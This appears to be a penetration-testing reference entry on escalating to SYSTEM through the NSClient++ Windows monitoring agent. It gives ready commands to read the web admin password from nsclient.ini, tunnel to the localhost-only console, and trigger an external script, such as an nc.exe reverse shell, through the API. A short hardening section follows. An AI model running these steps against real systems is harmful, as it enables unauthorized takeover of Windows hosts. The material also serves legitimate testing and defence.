NSClient++
aka nscp
Windows monitoring agent (Nagios/NSCP) running as SYSTEM, web UI on 8443. Recover its web password from nsclient.ini, reach the often localhost-only console via a tunnel, then run an external script as SYSTEM.
Ports
| Port | Proto | Notes |
|---|---|---|
8443 | tcp | NSClient++ web console (HTTPS) |
12489 | tcp | Legacy check port |
Fingerprint
- Self-signed cert / 'NSClient++' web UI on 8443
- C:\Program Files\NSClient++ on disk
Key files
| Path | Holds | Sensitive |
|---|---|---|
C:\Program Files\NSClient++\nsclient.ini | web admin password, allowed hosts | sensitive |
Exploitation primitives
- Read the web password from nsclient.ini (or `nscp.exe web -- password --display`)
- Console is usually 'allowed hosts = 127.0.0.1' — SSH/port-forward to reach it from localhost
- Define an external script + schedule it via the API; NSClient++ runs as SYSTEM, so the script does too
Overview
NSClient++ is a Windows monitoring agent that runs as NT AUTHORITY\SYSTEM. Controlling its web console (8443) means SYSTEM — the only hurdle is the password and the localhost-only restriction.
Recover the web password
gc "C:\Program Files\NSClient++\nsclient.ini"Or via the binary:
cmd /c "C:\Program Files\NSClient++\nscp.exe" web -- password --displayReach the localhost-only console
allowed hosts = 127.0.0.1 blocks remote access — tunnel to it:
ssh -L 8443:127.0.0.1:8443 user@<TARGET>Then log in at https://localhost:8443.
Run a script as SYSTEM
Drop a payload on disk, then in the console add it under Settings → external scripts → scripts, save the config, reload, and trigger the check via the API:
curl -sk -u admin:<PASSWORD> "https://localhost:8443/api/v1/queries/pwn/commands/execute?time=1m"The script (e.g. a nc.exe reverse shell) executes as SYSTEM.
Hardening
Set a strong web password, keep allowed hosts tight, disable external scripts, and run the agent under a least-privilege account where possible.